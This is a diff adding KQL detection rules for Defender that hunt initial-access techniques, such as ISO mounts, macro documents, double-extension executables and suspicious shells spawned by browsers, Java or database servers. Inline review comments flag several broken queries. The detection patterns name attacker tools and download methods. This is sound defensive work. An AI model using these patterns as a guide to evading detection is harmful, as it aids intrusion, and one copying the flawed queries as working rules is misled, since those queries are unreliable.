+// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001
+// False Positives:
+// - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
new file mode 100644
index 00000000..383905ac
--- /dev/null
+++ b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
@@ -0,0 +1,12 @@
+// Title: ISO File Created Within Temp Folders
+// Author: @sam0x90
+// Date: 2022-07-30
+// Level: high
+// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
new file mode 100644
index 00000000..c897e99c
--- /dev/null
+++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
@@ -0,0 +1,14 @@
+// Title: ISO or Image Mount Indicator in Recent Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
+This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Cases in which a user mounts an image file for legitimate reasons
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/Initial Access/octopus_scanner_malware.kql
new file mode 100644
index 00000000..9ec9586d
--- /dev/null
+++ b/KQL/rules/Initial Access/octopus_scanner_malware.kql
@@ -0,0 +1,10 @@
+// Title: Octopus Scanner Malware
+// Author: NVISO
+// Date: 2020-06-09
+// Level: high
+// Description: Detects Octopus Scanner Malware.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1195, attack.t1195.001
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/Initial Access/office_macro_file_creation.kql
new file mode 100644
index 00000000..cee346c6
--- /dev/null
+++ b/KQL/rules/Initial Access/office_macro_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Office Macro File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the systems
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Very common in environments that rely heavily on macro documents
+
+DeviceFileEvents
+| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
new file mode 100644
index 00000000..84f15830
--- /dev/null
+++ b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
@@ -0,0 +1,10 @@
+// Title: Office Macro File Creation From Suspicious Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: high
+// Description: Detects the creation of a office macro file from a a suspicious process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql
new file mode 100644
index 00000000..ad71288f
--- /dev/null
+++ b/KQL/rules/Initial Access/office_macro_file_download.kql
@@ -0,0 +1,15 @@ +// Title: Office Macro File Download +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: low +// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client). +This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Legitimate macro files downloaded from the internet +// - Legitimate macro files sent as attachments via emails + +DeviceFileEvents +| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") \ No newline at 
end of file diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql new file mode 100644 index 00000000..633e7e3c --- /dev/null +++ b/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql @@ -0,0 +1,12 @@ +// Title: Phishing Pattern ISO in Archive +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-07 +// Level: high +// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566 +// False Positives: +// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction + +DeviceProcessEvents +| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql new file mode 100644 index 00000000..7ab0fb11 --- /dev/null +++ b/KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql 
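Review bot: The second Description line `This can help identify potential malicious activity, ...` is emitted without the `//` prefix, so it is not a comment but a bare line that will almost certainly fail to parse when the file is pasted into Kusto as a query. Either prefix the continuation with `// ` or have the converter join multi-line descriptions onto comment lines; the same broken continuation appears in the suspicious_file_created_in_outlook_temporary_directory, suspicious_file_write_to_sharepoint_layouts_directory and suspicious_lnk_command_line_padding_with_whitespace_characters hunks below. Since these all come from multi-line source descriptions, fixing the generator resolves all four at once.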
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - ScreenConnect Server Web Shell Execution
+// Author: Jason Rathbun (Blackpoint Cyber)
+// Date: 2024-02-26
+// Level: high
+// Description: Detects potential web shell execution from the ScreenConnect server process.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
new file mode 100644
index 00000000..a78e1886
--- /dev/null
+++ b/KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql
@@ -0,0 +1,10 @@ +// Title: Running Chrome VPN Extensions via the Registry 2 VPN Extension +// Author: frack113 +// Date: 2021-12-28 +// Level: high +// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.t1133 + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains 
"inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey 
contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or 
RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql new file mode 100644 index 00000000..6c1c13cf --- /dev/null +++ b/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql @@ -0,0 +1,13 @@ +// Title: Shell Process Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali +// Date: 2021-12-17 +// Level: medium +// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file 
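Review bot: `RegistryKey endswith "update_url"` will not match in DeviceRegistryEvents, because `update_url` is a value name and Defender reports it in `RegistryValueName` while `RegistryKey` holds only the key path; as written the first `and` clause is never true and the rule is dead. Replace that clause with `RegistryValueName =~ "update_url"`, keeping the `RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions"` check and the extension-id `contains` checks on `RegistryKey`, where they belong. Any other registry rule in this commit whose source target path ended in a value name is likely converted the same way, so this is worth checking in the converter rather than in this file alone.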
diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql
new file mode 100644
index 00000000..4d6b1c5f
--- /dev/null
+++ b/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql
@@ -0,0 +1,12 @@ +// Title: Suspicious Browser Child Process - MacOS +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-04-05 +// Level: medium +// Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1189, attack.t1203, attack.t1059 +// False Positives: +// - Legitimate browser install, update and recovery scripts + +DeviceProcessEvents +| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/osascript" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/pwsh" or FolderPath endswith "/python" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/wget" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath contains "com.apple.WebKit.WebContent" or InitiatingProcessFolderPath contains "firefox" or InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome" or InitiatingProcessFolderPath contains "Microsoft Edge" or InitiatingProcessFolderPath contains "Opera" or InitiatingProcessFolderPath contains "Safari" or InitiatingProcessFolderPath contains "Tor Browser")) and (not(((((ProcessCommandLine contains "/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/" and ProcessCommandLine contains "/Resources/install.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_preflight.sh") or (ProcessCommandLine contains "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/" and ProcessCommandLine contains "/Resources/keystone_promote_postflight.sh")) and (InitiatingProcessFolderPath contains "Google Chrome Helper" 
or InitiatingProcessFolderPath contains "Google Chrome")) or ((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Application Support/Google/Chrome/recovery/" and ProcessCommandLine contains "/ChromeRecovery") and (InitiatingProcessFolderPath contains "Google Chrome Helper" or InitiatingProcessFolderPath contains "Google Chrome")) or ProcessCommandLine contains "--defaults-torrc" or ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*" or ((ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "hw.model") and InitiatingProcessFolderPath contains "Microsoft Edge")))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql new file mode 100644 index 00000000..685c4387 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql 
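Review bot: The exclusion `ProcessCommandLine =~ "*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*"` never matches, because `=~` is case-insensitive equality and the asterisks are literal characters, so the Microsoft AutoUpdate false-positive filter is silently lost. Express it as `(ProcessCommandLine contains "/Library/Application Support/Microsoft/MAU" and ProcessCommandLine contains "/Microsoft AutoUpdate.app/Contents/MacOS/msupdate")` or a `matches regex` equivalent. This looks like a converter gap for values with wildcards in the middle of the string, so other rules in the commit may carry the same dead filter. Separately, the trailing `not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))` reads more clearly as `isnotempty(ProcessCommandLine)`.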
@@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of SQL Server +// Author: FPT.EagleEye Team, wagga +// Date: 2020-12-11 +// Level: high +// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql new file mode 100644 index 00000000..46b851ed --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of Veeam Dabatase +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: critical +// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql new file mode 100644 index 00000000..f4bcc899 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Double Extension File Execution +// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-06-26 +// Level: high +// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or 
FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql new file mode 100644 index 00000000..c04e9c5a --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution From Outlook Temporary Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: high +// Description: Detects a suspicious program execution in Outlook temp folder +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceProcessEvents +| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql new file mode 100644 index 00000000..231e4c26 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql 
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution via macOS Script Editor
